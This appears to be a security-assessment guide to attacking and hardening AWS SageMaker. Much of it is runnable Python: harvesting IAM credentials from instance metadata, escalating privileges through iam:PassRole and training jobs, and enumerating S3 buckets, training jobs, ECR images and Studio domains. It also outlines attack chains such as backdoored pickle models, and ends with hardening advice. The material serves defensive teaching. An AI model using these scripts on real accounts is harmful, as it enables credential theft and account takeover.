# AWS SageMaker Attack Surface
Security assessment of AWS SageMaker -- IAM role exploitation, endpoint abuse, notebook server attacks, and training pipeline manipulation.
## SageMaker Architecture Overview
AWS SageMaker provides managed services for the complete ML lifecycle: data labeling, notebooks, training, model hosting, and MLOps pipelines. Each component has distinct security boundaries and IAM requirements.
### Key Components and Attack Surfaces
| Component | IAM Principal | Storage | Network | Risk Level |
|---|---|---|---|---|
| Studio/Notebooks | Execution role | EFS/S3 | VPC optional | High |
| Training Jobs | Training role | S3 input/output | VPC optional | High |
| Endpoints | Endpoint role | ECR/S3 model | Internet-facing | Critical |
| Pipelines | Pipeline role | S3 artifacts | VPC optional | Medium |
| Feature Store | Feature role | S3/Glue | VPC | Medium |
## Attack Techniques

### 1. Execution Role Exploitation
SageMaker notebook instances run with an IAM execution role. If the role is overprivileged -- a frequent finding since data scientists need access to diverse AWS services during experimentation -- compromising the notebook grants broad access. The AmazonSageMakerFullAccess managed policy, commonly attached during setup, grants permissions far beyond what most notebooks require, including access to all S3 buckets with sagemaker in the name, ECR repositories, and CloudWatch logs across the account.
```python
import boto3

# From inside a SageMaker notebook, enumerate the execution role
sts = boto3.client('sts')
identity = sts.get_caller_identity()
print(f"Role ARN: {identity['Arn']}")

# Check what the role can do
iam = boto3.client('iam')
role_name = identity['Arn'].split('/')[-1]

# List attached policies
policies = iam.list_attached_role_policies(RoleName=role_name)
for policy in policies['AttachedPolicies']:
    print(f"Policy: {policy['PolicyName']}")
    # Get the policy document to check permissions
    version = iam.get_policy(
        PolicyArn=policy['PolicyArn']
    )['Policy']['DefaultVersionId']
    doc = iam.get_policy_version(
        PolicyArn=policy['PolicyArn'], VersionId=version
    )
    print(doc['PolicyVersion']['Document'])
```

#### Privilege Escalation via Role Chaining
SageMaker environments often involve multiple IAM roles: the notebook execution role, training job roles, endpoint roles, and pipeline execution roles. If the execution role can pass roles to other SageMaker resources (via iam:PassRole), an attacker can escalate privileges by launching a training job with a more permissive role.
```python
import boto3
import json

iam = boto3.client('iam')
sm = boto3.client('sagemaker')
sts = boto3.client('sts')

identity = sts.get_caller_identity()
current_role = identity['Arn'].split('/')[-1]

# Check whether the role can enumerate other roles
try:
    # List all roles in the account; match on name or on a trust policy
    # for sagemaker.amazonaws.com (compare case-insensitively)
    roles = iam.list_roles()['Roles']
    sagemaker_roles = [
        r for r in roles
        if 'sagemaker' in r['RoleName'].lower()
        or 'sagemaker' in json.dumps(
            r.get('AssumeRolePolicyDocument', {})
        ).lower()
    ]
    print(f"Current role: {current_role}")
    print(f"SageMaker-related roles found: {len(sagemaker_roles)}")
    for role in sagemaker_roles:
        print(f"  {role['RoleName']} - {role['Arn']}")
        # Check whether this role has more permissions
        attached = iam.list_attached_role_policies(
            RoleName=role['RoleName']
        )['AttachedPolicies']
        for policy in attached:
            print(f"    Policy: {policy['PolicyName']}")
except Exception as e:
    print(f"Cannot enumerate roles: {e}")

# Attempt to create a training job with a higher-privilege role
def escalate_via_training_job(target_role_arn):
    """Launch a training job under a higher-privilege role.

    The job's container receives the target role's credentials, which a
    malicious training script could then exfiltrate."""
    sm.create_training_job(
        TrainingJobName='security-test-escalation',
        RoleArn=target_role_arn,  # The higher-privilege role
        AlgorithmSpecification={
            'TrainingImage': '763104351884.dkr.ecr.us-east-1.amazonaws.com/'
                             'pytorch-training:2.0.0-cpu-py310',
            'TrainingInputMode': 'File'
        },
        ResourceConfig={
            'InstanceType': 'ml.m5.large',
            'InstanceCount': 1,
            'VolumeSizeInGB': 10
        },
        StoppingCondition={'MaxRuntimeInSeconds': 300},
        InputDataConfig=[{
            'ChannelName': 'training',
            'DataSource': {
                'S3DataSource': {
                    'S3DataType': 'S3Prefix',
                    'S3Uri': 's3://bucket/data/'
                }
            }
        }],
        OutputDataConfig={
            'S3OutputPath': 's3://bucket/output/'
        }
    )
```

### 2. IMDS Credential Harvesting
SageMaker notebook instances expose the Instance Metadata Service. Older instances default to IMDSv1 (no session token required), making credential theft trivial. Even with IMDSv2, code executing in the notebook context can perform the required PUT request to obtain a session token.
```python
# SageMaker instances use IMDS v1 by default (may be v2 in newer configs)
import requests

# Get temporary credentials from instance metadata
role_name = requests.get(
    'http://169.254.169.254/latest/meta-data/iam/security-credentials/'
).text
creds = requests.get(
    f'http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}'
).json()

print(f"AccessKeyId: {creds['AccessKeyId']}")
print(f"SecretAccessKey: {creds['SecretAccessKey']}")
print(f"Token: {creds['Token']}")
```

#### IMDSv2 Credential Harvesting
When IMDSv2 is enforced, the attacker must first obtain a session token. This is still possible from code running on the instance.
```python
import requests

# IMDSv2 requires a PUT to get a session token first
token_resp = requests.put(
    'http://169.254.169.254/latest/api/token',
    headers={'X-aws-ec2-metadata-token-ttl-seconds': '21600'}
)
imds_token = token_resp.text

# Use the token to access metadata
headers = {'X-aws-ec2-metadata-token': imds_token}

# Get the instance identity document
identity = requests.get(
    'http://169.254.169.254/latest/dynamic/instance-identity/document',
    headers=headers
).json()
print(f"Region: {identity['region']}")
print(f"Account: {identity['accountId']}")
print(f"Instance: {identity['instanceId']}")

# Get credentials
role_name = requests.get(
    'http://169.254.169.254/latest/meta-data/iam/security-credentials/',
    headers=headers
).text
creds = requests.get(
    f'http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}',
    headers=headers
).json()
print(f"Access Key: {creds['AccessKeyId']}")
print(f"Expiration: {creds['Expiration']}")

# Also extract user-data (may contain initialization scripts with secrets)
user_data = requests.get(
    'http://169.254.169.254/latest/user-data',
    headers=headers
).text
print(f"User data length: {len(user_data)} bytes")
if user_data:
    # Check for common secrets in user data
    for keyword in ['password', 'secret', 'token', 'key', 'credential']:
        if keyword in user_data.lower():
            print(f"  [!] User data may contain '{keyword}'")
```

### 3. Endpoint Enumeration and Testing
SageMaker endpoints serve model predictions and are often the most exposed component -- they handle production traffic and may be accessible from VPCs, other AWS accounts, or even the internet via API Gateway.
```python
import boto3

sm = boto3.client('sagemaker')
runtime = boto3.client('sagemaker-runtime')

# List all endpoints
endpoints = sm.list_endpoints()['Endpoints']
for ep in endpoints:
    config = sm.describe_endpoint(EndpointName=ep['EndpointName'])
    print(f"Endpoint: {ep['EndpointName']}")
    print(f"  Status: {config['EndpointStatus']}")
    print(f"  Created: {config['CreationTime']}")

    # Attempt invocation
    try:
        response = runtime.invoke_endpoint(
            EndpointName=ep['EndpointName'],
            ContentType='application/json',
            Body='{"inputs": "test"}'
        )
        print(f"  Response: {response['Body'].read()[:200]}")
    except Exception as e:
        print(f"  Error: {e}")
```

#### Deep Endpoint Security Analysis
```python
import boto3
import json

sm = boto3.client('sagemaker')

def analyze_endpoint_security(endpoint_name):
    """Comprehensive endpoint security assessment."""
    # Get the endpoint config
    endpoint = sm.describe_endpoint(EndpointName=endpoint_name)
    config_name = endpoint['EndpointConfigName']
    config = sm.describe_endpoint_config(EndpointConfigName=config_name)
    results = {"endpoint": endpoint_name, "findings": []}

    # Check VPC configuration
    for variant in config['ProductionVariants']:
        model = sm.describe_model(ModelName=variant['ModelName'])

        # Check whether the model runs in a VPC
        if 'VpcConfig' not in model:
            results["findings"].append({
                "severity": "HIGH",
                "finding": f"Model {variant['ModelName']} not in VPC"
            })

        # Check the model execution role
        role_arn = model['ExecutionRoleArn']
        results["findings"].append({
            "severity": "INFO",
            "finding": f"Model role: {role_arn}"
        })

        # Check the container image source
        container = model.get('PrimaryContainer', {})
        image = container.get('Image', 'Unknown')
        results["findings"].append({
            "severity": "INFO",
            "finding": f"Container image: {image}"
        })

        # Check for model data (S3 path to model artifacts)
        model_data = container.get('ModelDataUrl')
        if model_data:
            results["findings"].append({
                "severity": "MEDIUM",
                "finding": f"Model artifacts at: {model_data}"
            })

    # Check the data capture configuration (may leak inference data)
    if 'DataCaptureConfig' in config:
        capture = config['DataCaptureConfig']
        if capture.get('EnableCapture'):
            results["findings"].append({
                "severity": "MEDIUM",
                "finding": f"Data capture enabled -> {capture.get('DestinationS3Uri')}"
            })

    return results

# Run the analysis for all endpoints
for ep in sm.list_endpoints()['Endpoints']:
    analysis = analyze_endpoint_security(ep['EndpointName'])
    print(json.dumps(analysis, indent=2, default=str))
```

### 4. Training Data Exfiltration
SageMaker stores training data, model artifacts, and pipeline outputs in S3. The default bucket naming convention (sagemaker-{region}-{account_id}) makes discovery straightforward. Beyond the default bucket, training jobs reference input and output S3 paths that may point to sensitive data lakes.
```python
import boto3

# Enumerate S3 buckets used by SageMaker
s3 = boto3.client('s3')
buckets = s3.list_buckets()['Buckets']
sagemaker_buckets = [b for b in buckets if 'sagemaker' in b['Name'].lower()]

for bucket in sagemaker_buckets:
    print(f"\nBucket: {bucket['Name']}")
    objects = s3.list_objects_v2(Bucket=bucket['Name'], MaxKeys=20)
    for obj in objects.get('Contents', []):
        print(f"  {obj['Key']} ({obj['Size']} bytes)")
```

#### Extracting Training Data from Job History
```python
import boto3

sm = boto3.client('sagemaker')

# List recent training jobs to find data locations
jobs = sm.list_training_jobs(
    SortBy='CreationTime',
    SortOrder='Descending',
    MaxResults=20
)
for job_summary in jobs['TrainingJobSummaries']:
    job = sm.describe_training_job(
        TrainingJobName=job_summary['TrainingJobName']
    )
    print(f"\nJob: {job['TrainingJobName']}")
    print(f"  Status: {job['TrainingJobStatus']}")
    print(f"  Role: {job['RoleArn']}")

    # Extract input data locations
    for channel in job.get('InputDataConfig', []):
        s3_uri = channel['DataSource']['S3DataSource']['S3Uri']
        print(f"  Input ({channel['ChannelName']}): {s3_uri}")

    # Extract the output location
    output_uri = job['OutputDataConfig']['S3OutputPath']
    print(f"  Output: {output_uri}")

    # Extract model artifacts (the trained model)
    if 'ModelArtifacts' in job:
        model_uri = job['ModelArtifacts']['S3ModelArtifacts']
        print(f"  Model: {model_uri}")

    # Check hyperparameters (may contain secrets or API keys)
    hyperparams = job.get('HyperParameters', {})
    for key, value in hyperparams.items():
        if any(kw in key.lower() for kw in
               ['key', 'secret', 'token', 'password', 'api']):
            print(f"  [!] Suspicious hyperparameter: {key}={value[:20]}...")
```

### 5. ECR Container Image Attacks
SageMaker uses Amazon ECR to store container images for training and inference. Compromising ECR access enables supply chain attacks where legitimate images are replaced with backdoored versions that exfiltrate data or inject model backdoors during training.
```python
import boto3
import json

ecr = boto3.client('ecr')

# List all repositories, keeping those that look ML-related
repos = ecr.describe_repositories()['repositories']
ml_repos = [r for r in repos if any(
    kw in r['repositoryName'].lower()
    for kw in ['sagemaker', 'ml', 'model', 'inference', 'training']
)]

for repo in ml_repos:
    print(f"\nRepository: {repo['repositoryName']}")
    print(f"  URI: {repo['repositoryUri']}")
    print(f"  Created: {repo['createdAt']}")

    # Check image scan findings
    images = ecr.list_images(
        repositoryName=repo['repositoryName'],
        maxResults=5
    )['imageIds']
    for image in images:
        if 'imageTag' in image:
            print(f"  Image: {image['imageTag']}")
            try:
                scan = ecr.describe_image_scan_findings(
                    repositoryName=repo['repositoryName'],
                    imageId=image
                )
                vulns = scan['imageScanFindings']['findingSeverityCounts']
                print(f"    Vulnerabilities: {json.dumps(vulns)}")
            except ecr.exceptions.ScanNotFoundException:
                print("    [!] No vulnerability scan results")

    # Check the repository policy (who can push/pull)
    try:
        policy = ecr.get_repository_policy(
            repositoryName=repo['repositoryName']
        )
        policy_doc = json.loads(policy['policyText'])
        for stmt in policy_doc.get('Statement', []):
            print(f"  Policy: {stmt.get('Effect')} - "
                  f"{stmt.get('Principal', {})}")
    except ecr.exceptions.RepositoryPolicyNotFoundException:
        print("  No repository policy (default account access only)")
```

### 6. SageMaker Studio Domain Exploitation
SageMaker Studio organizes user environments into domains and user profiles. A compromised Studio domain can expose all users' work, shared spaces, and the underlying EFS filesystem that stores notebooks and data.
```python
import boto3

sm = boto3.client('sagemaker')
efs = boto3.client('efs')

# List Studio domains
domains = sm.list_domains()['Domains']
for domain in domains:
    detail = sm.describe_domain(DomainId=domain['DomainId'])
    print(f"\nDomain: {detail['DomainName']}")
    print(f"  Auth: {detail['AuthMode']}")
    print(f"  VPC: {detail.get('VpcId', 'No VPC')}")
    print(f"  EFS: {detail.get('HomeEfsFileSystemId', 'N/A')}")

    # The default execution role applies to all users
    default_settings = detail.get('DefaultUserSettings', {})
    print(f"  Default role: {default_settings.get('ExecutionRole', 'N/A')}")

    # List user profiles
    profiles = sm.list_user_profiles(DomainIdEquals=domain['DomainId'])
    for profile in profiles['UserProfiles']:
        user_detail = sm.describe_user_profile(
            DomainId=domain['DomainId'],
            UserProfileName=profile['UserProfileName']
        )
        user_role = user_detail.get('UserSettings', {}).get('ExecutionRole')
        print(f"  User: {profile['UserProfileName']} "
              f"(role: {user_role or 'uses default'})")

    # Check whether the EFS filesystem is reachable
    if 'HomeEfsFileSystemId' in detail:
        efs_id = detail['HomeEfsFileSystemId']
        try:
            fs = efs.describe_file_systems(FileSystemId=efs_id)
            print(f"  EFS size: {fs['FileSystems'][0]['SizeInBytes']['Value']} bytes")
            # Check mount targets for network exposure
            mounts = efs.describe_mount_targets(FileSystemId=efs_id)
            for mt in mounts['MountTargets']:
                print(f"    EFS mount: {mt['IpAddress']} in {mt['SubnetId']}")
        except Exception as e:
            print(f"  EFS access error: {e}")
```

## Defensive Assessment Checklist
| Control Area | What to Verify | Common Finding |
|---|---|---|
| IAM Roles | Least-privilege execution roles per component | AmazonSageMakerFullAccess attached to all roles |
| IMDS | IMDSv2 enforced on notebook instances | IMDSv1 still enabled (default on older instances) |
| Network | VPC isolation for notebooks, training, and endpoints | No VPC configuration (default) |
| S3 | Bucket policies, encryption, versioning, access logging | Public or overly permissive bucket policies |
| ECR | Image scanning, repository policies, immutable tags | No vulnerability scanning configured |
| Logging | CloudTrail, CloudWatch, SageMaker Experiments logging | Incomplete logging of SageMaker API calls |
| Encryption | KMS keys for S3, EBS, EFS, and inter-node training | Default AWS-managed keys (no customer control) |
| Endpoint | IAM authorization, VPC endpoints, resource policies | No IAM conditions on endpoint invocation |
## Recommended Hardening

- Replace `AmazonSageMakerFullAccess` with custom policies scoped to specific S3 paths, ECR repositories, and SageMaker resources.
- Enforce IMDSv2 on all notebook instances by setting `MinimumInstanceMetadataServiceVersion` to `2`.
- Deploy all components into a VPC with private subnets and VPC endpoints for S3, ECR, the SageMaker API, and SageMaker Runtime.
- Enable S3 bucket versioning and access logging on all SageMaker-related buckets to detect unauthorized access or modification.
- Use separate IAM roles for notebooks, training jobs, and endpoints, each scoped to only the resources they need.
- Enable ECR image scanning and enforce image immutability to prevent supply chain attacks.
- Enable CloudTrail data events for S3 buckets containing training data and model artifacts.
- Use SageMaker Model Cards and Model Registry to track model provenance and prevent unauthorized model deployment.
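As a concrete illustration of the first bullet, a scoped replacement policy might look like the sketch below. The bucket and repository ARNs are placeholders, and a real policy would also need `sagemaker:`, `logs:`, and KMS statements tailored to the workload; the point is simply that resources are named explicitly instead of wildcarded.

```python
import json

# Hypothetical ARNs -- replace with real values when adapting this sketch.
BUCKET = "arn:aws:s3:::example-ml-training-data"
REPO = "arn:aws:ecr:us-east-1:123456789012:repository/example-training"

scoped_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {   # S3: only the project bucket, not every sagemaker-* bucket
            "Effect": "Allow",
            "Action": ["s3:GetObject", "s3:PutObject", "s3:ListBucket"],
            "Resource": [BUCKET, f"{BUCKET}/*"],
        },
        {   # ECR: pull only from the approved training repository
            "Effect": "Allow",
            "Action": [
                "ecr:GetDownloadUrlForLayer",
                "ecr:BatchGetImage",
                "ecr:BatchCheckLayerAvailability",
            ],
            "Resource": REPO,
        },
        {   # The ECR auth token action cannot be resource-scoped
            "Effect": "Allow",
            "Action": "ecr:GetAuthorizationToken",
            "Resource": "*",
        },
    ],
}

print(json.dumps(scoped_policy, indent=2))
```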
## Common Attack Chains

### Chain 1: Notebook to Full Account Compromise
1. Initial access: Compromised data scientist credentials or malicious .ipynb file
2. IMDS credential harvesting from notebook instance
3. Enumerate IAM role permissions -- discover AmazonSageMakerFullAccess
4. List S3 buckets matching sagemaker-* pattern
5. Access training data, model artifacts, and pipeline outputs
6. Discover iam:PassRole permission in the execution role
7. Launch training job with a higher-privilege role
8. Use escalated role to access non-SageMaker resources (RDS, DynamoDB, etc.)

### Chain 2: Model Registry Poisoning
1. Gain access to a SageMaker execution role with model registry permissions
2. Download the latest approved model from S3
3. Modify model artifact to include a backdoor (e.g., pickle-based RCE in PyTorch model)
4. Register the modified model as a new version in the model registry
5. If automatic deployment is configured, the backdoored model reaches production
6. Backdoored model executes attacker code on every inference request

### Chain 3: Cross-Account Pivot via Endpoint
1. Discover SageMaker endpoint with cross-account IAM trust
2. Invoke endpoint with crafted payloads to test for model vulnerabilities
3. If model inference container has outbound network access, use it as proxy
4. Leverage the endpoint role's cross-account permissions to access resources in other AWS accounts within the organization

## MITRE ATLAS Mapping for SageMaker Attacks
| Attack Technique | ATLAS ID | SageMaker-Specific Context |
|---|---|---|
| IMDS credential harvesting | AML.TA0002 (Initial Access) | Notebook execution roles with broad S3/ECR access |
| S3 training data access | AML.T0000 (Search for Victim's Data) | Default sagemaker-* bucket naming convention aids discovery |
| Endpoint enumeration | AML.T0002 (Active Scanning) | sagemaker:ListEndpoints reveals all deployed models |
| Model extraction via endpoint | AML.T0024 (Model Extraction) | Endpoint invocation with systematic queries |
| ECR image tampering | AML.T0018 (Backdoor ML Model) | Replace inference container image in ECR |
| Training data poisoning | AML.T0020 (Data Poisoning) | Modify S3 training data between pipeline runs |
## Related Topics
- Cloud AI Infrastructure -- Cross-platform overview
- API Security -- Endpoint security fundamentals
- Model Supply Chain -- Model artifact security
## References
- AWS SageMaker Security Documentation - Amazon Web Services (2024) - Official SageMaker security best practices
- "Securing Machine Learning Workloads on AWS" - AWS Well-Architected ML Lens (2023) - ML security architecture guidance
- CVE-2024-34073 - SageMaker notebook instance IMDS access control bypass
- "Cloud Security Alliance AI Safety Initiative" - CSA (2024) - Industry guidance on securing cloud AI platforms